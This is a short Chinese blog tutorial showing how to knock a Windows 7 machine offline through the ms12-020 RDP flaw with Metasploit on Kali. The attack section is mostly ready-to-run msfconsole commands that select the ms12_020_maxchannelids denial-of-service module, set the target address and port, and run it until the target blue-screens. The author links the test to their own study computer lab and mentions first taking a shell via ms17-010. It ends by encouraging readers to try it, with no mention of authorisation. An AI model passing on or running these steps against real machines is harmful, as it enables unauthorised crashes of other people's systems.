前言
这次了解到我们学习的机房可能存在ms12-020漏洞,全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),所以打算测试测试。
工具:kali系统
注意:目标机与本机得互通才行,该漏洞支持win7和win2008,不支持win10,不过大部分机房估计都可以使用,需开启3389端口,我这里是先进行了ms17-010漏洞获取了shell,开启了3389端口,才可以执行的
攻击机kali:192.168.8.39
目标靶机win7:192.168.8.238
这里还存在ms17-010(永恒之蓝)漏洞,利用445端口入侵,获取shell进行提权。这里我就不演示了,相关的可以去百度。
开始攻击
一、首先我们先ping一下目标靶机
二、进入kali系统的msfconsole攻击框架,使用漏洞
代码:
代码语言:javascript复制1.msfconsole #进入msfconsole 框架
2.search ms12-020 #搜索ms12-020漏洞
3.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #使用这个漏洞,第二个是检查这个目标是否存在漏洞,我这里就不检查了
三、配置相关目标信息
命令介绍:
代码语言:javascript复制1.show options #查看相关参数设置
2.set RHOSTS 192.168.8.238 #设置目标靶机的ip地址
3.set RPORT 3389 #设置目标靶机的ip地址,默认3389
四、执行攻击,查看效果
命令:
代码语言:javascript复制run #开始攻击
上图已经是攻击成功了,接下来我们查看效果。
这样就已经成功了,目标靶机应该已经蓝屏死机了,这里已经ping不到了。大家有机会的话可以去试试。
想要了解更多的朋友可以去百度哦~